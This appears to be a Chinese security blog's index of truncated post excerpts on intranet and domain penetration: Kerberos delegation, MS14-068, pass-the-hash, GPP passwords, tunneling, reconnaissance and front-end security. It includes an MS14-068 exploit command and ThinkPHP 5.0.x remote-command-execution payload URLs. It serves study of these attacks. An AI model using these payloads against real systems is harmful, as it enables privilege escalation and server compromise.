Kerberos委派攻击
将域内用户的权限委派给服务账号,使得服务账号能以用户权限开展域内活动
setspn -U -A variant/golden Alice设置为服务账户
只有服务账户或者主机账户才有委派功能
非约束委派
过程
用户向AS发送AS_REQ请求Forwardable TGT1(可转发TGT)
AS返回TGT1和SessionKey[TGT1]
用户向KDC发送AS_REQ请求Forwardable TGT2
AS返回TGT2和SessionKey[TGT2]
用户使用SessionKey[TGT1] 向TGS发送TGT1,请求与Server 1通信的Service ...
MS14-068简述MS14-068编号CVE-2014-6324,补丁为3011780,该漏洞允许域内任何一个普通用户,将自己提升至域管权限
复现环境
域控:server08.yogalab.com:192.168.1.240
域内主机:win7.yogalab.com:192.168.1.241
域外主机:192.168.1.164
条件
域成员账号密码
域成员SID
域控地址
03以上服务器或PC
流程
利用ms14-068.py生成TGT票据
1ms14-068.exe -u win7@yogalab.com -p win07.yoga.com -s S-1-5-21...
Kerberos协议(详细))
Client → KDC_AS
客户端账号Admin首先将密码利用散列运算转换成NTLM散列Key-Client
利用Key-Client将当前时间戳进行加密,生成一个字符串Key-Client{Stamp}
将生成的字符串、Admin的信息Info(A)以及一段随机字符串nonce发送给KDC_AS(身份验证服务),这就构成了AS-REQ请求
【注】:加密时间戳可以在一定程度上抵抗重放攻击
公式:
1AS-REQ = Key-Client{Stamp} + Info(A) + nonce
数据包:
KDC_AS → Client...
简介在Windows中,系统通常不会存储用户登录密码,而是存储密码的哈希值。所以当攻击者获取了存储在计算机中的hash值,尽管不知道明文值,也能通过传送密码的Hash值来连接远程主机
【注】微软在2014年发布了KB2871997和KB2928120两个补丁,用来阻止域内主机本地用户的网络登录,这样就无法以本地管理员的权限执行wmi、psexec、schtasks、at和文件访问共享,本地用户的PTH方式已经死掉,然而默认的Administrator(SID 500)这个账户仍可以进行PTH,并且在禁用NTLM的情况下,psexec无法进行远程连接,但是使用mimikatz可以攻击成功
...
本机权限的提升GPP在内网域环境中的利用GPP是指组策略首选项,GPP通过操作组策略对象GPO对域中的资源进行管理。
SYSVOL是AD里面一个存储域公共文件服务器副本的共享文件夹,所有的认证用户都可以读取。SYSVOL包括登录脚本,组策略数据以及其他域控所需要的域数据。SYSVOL能在所有域控里面进行自动同步和共享
SYSVOL存储在
1\\<Domain>\SYSVOL\<Domain>\Policies\
因此,简单的来说就是,出于想更新每台主机上本地账户密码的目的,利用GPP可以指定某个域账户为所有计算机的本地计算机管理账户。而这个账号存储在SYS...
流量操控及内网穿透场景
内网机器受到边界防火墙的限制,访问受限的网络环境
使用隐蔽的手段逃避安全检查措施和溯源追踪
在非受信任的网络中实现安全的数据传输
重定向(Rdirection)端口转发
传输使用的明文
隧道 (Tunneling)
隧道技术是一种通过使用互联网络的基本设施在网络之间传递数据的方式,使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。隧道技术将其他协议的数据帧或者数据包重新封装然后通过隧道发送。新的帧头提供路由信息,以便互联网传递被封装的负载数据。 —-百度百科
在不受信任的网络环境中实现安全的通信
通常使用多种加密技术建立通信隧道
点到点(IP...
前言
目标资产信息搜集的程度,决定渗透过程的复杂程度。目标主机信息搜集的深度,决定后渗透权限持续把控。渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。 —-Micropoor
渗透的本质是信息收集
本机信息收集
基础信息:
内网网段信息,查看网卡信息收集内部地址段的信息
内网大小
核心业务信息:
内网OA办公系统、邮件服务器、网络监控系统、财务应用系统、核心产品源码(SVN服务器、git服务器等...
前话最近开始简简单单的捣鼓下内网渗透了,从基础开始磨
域(Domain)用来描述一种系统架构,和”工作组”相对应,由工作组升级而来的高级架构,在域架构中,可以实现统一化管理。用户名和密码是放在域控制器去验证的
最大好处:通过组策略来统一化管理
工作组架构:每台计算机都是平等的。
特性
安全边界
父域的域控并不能管理子域
复制单元
一个域中的所有DC的活动目录数据库都相互同步(备份域控BDC)
多主复制和单主复制
三个逻辑分区:Domain、Configration、Schema。在同一个域的DC,三个分区数据都同步;如果不是一个域中的DC,只同步后两个分区(父域和子...
0x00 前言抽空分析一波
0x01 5.0.x漏洞分析POC集合
extend(需要think-captcha)
POC 1(覆盖get变量)
POC 2 (覆盖server变量)
123/public/index.php?s=captcha_method=__construct&method=get&filter[]=system&get[]=whoami
123/public/index.php?s=captcha_method=__construct&method=get&filter[]=system&server[R...
0x00 前言浅浅地窥探下前端安全
0x01 同源策略同源策略是浏览器的一个安全功能,只有在同协议、同域名、同端口的情况下浏览器才能接受资源。比如针对 http://www.a.com/来说
http://www.a.com/dir/file.html 同源 http://abc.www.a.com/dir/file.html 不同源(域名不同)
file://www.a.com/dir/file.html 不同源(协议不同)
http://www.b.com/dir/file.html 不同源(域名不同)
http://www.a.com:8080/di...